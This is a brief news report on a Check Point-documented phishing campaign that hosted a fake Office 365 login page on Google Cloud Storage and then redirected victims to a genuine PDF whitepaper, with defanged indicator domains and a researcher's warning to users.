A lie is best concealed between two truths, an old saying goes, and it seems hackers are using this wisdom to better hide their phishing efforts.
Cybersecurity researchers from Check Point are warning of a phishing campaign that utilizes Google Cloud Services and offers legitimate PDF whitepapers to victims that give away their login credentials.
According to the researchers, it all starts with a PDF document uploaded to Googel Drive, containing a link to a phishing page. The landing page, hosted on storage.googleapis[.]com/sharepoint-unwearied-439052791/index.html, requires the user to log in with their Office 365 or organization email.
After the victim gives away their login credentials, they are redirected to a genuine PDF report published by a “renowned global consulting firm.”
Since the phishing page is hosted on Google Cloud Storage, “the user never becomes suspicious," claims Check Point. Upon further inspection, however, it is easy to see that most of the resources are loaded from prvtsmtp[.]com, a Ukrainian website.
“Hackers are swarming around the cloud storage services that we rely on and trust, making it much tougher to identify a phishing attack,” said Lotem Finkelsteen, Manager of Threat Intelligence at Check Point.
“Traditional red flags of a phishing attack, such as look-alike domains or websites without certificates, won’t help us much as we enter a potential cyber pandemic. Users of Google Cloud Platform, even AWS and Azure users, should all beware of this fast-growing trend and learn how to protect themselves. It starts by thinking twice about the files you receive from senders.”